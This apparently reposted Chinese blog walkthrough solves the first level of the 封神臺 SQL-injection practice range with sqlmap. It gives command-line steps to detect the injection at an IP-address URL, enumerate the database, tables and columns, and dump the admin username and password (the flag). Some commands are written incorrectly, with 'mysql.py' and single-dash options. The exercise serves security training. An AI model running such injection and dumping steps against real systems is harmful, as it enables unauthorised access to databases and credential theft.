如何使用sqlmap破解封神臺靶場第一關
阿新 • • 發佈:2020-12-17
文章目錄
一.檢視是否有注入
使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch
-u指令為檢視網址的url是否有漏洞。-batch為永遠不要求使用者輸入資訊,預設執行。
我們可以看到,存在sql注入漏洞。
二.查詢當前資料庫
mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch
-cuurent-db 意思為查詢當前的資料庫資訊,也可以用-dbs查詢所有的資料庫。
三.查詢資料庫的表
上面我們已知當前資料庫為 maoshe,所以我們指定資料庫查詢表。
mysql.py -u http://59.63.200.79:8003/?id=1 -D “maoshe” -tables -batch
得出查詢到的當前資料庫表為admin dirs news xss4個。
四.查詢表中的列
一般管理員的帳號密碼都會在admin裡面,所以我們可以檢視下admin裡面的欄位。
mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns -batch
這裡的-t為指定表,然後使用-columns 檢視欄位名稱
我們可以得知,欄位名稱為id,password,username三個。所以我們提取username和password就可以了。
五.查詢具體內容
使用 mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C “username,password” -dump -batch
最後我們得出admin密碼為helloback,這個就是本題的flag。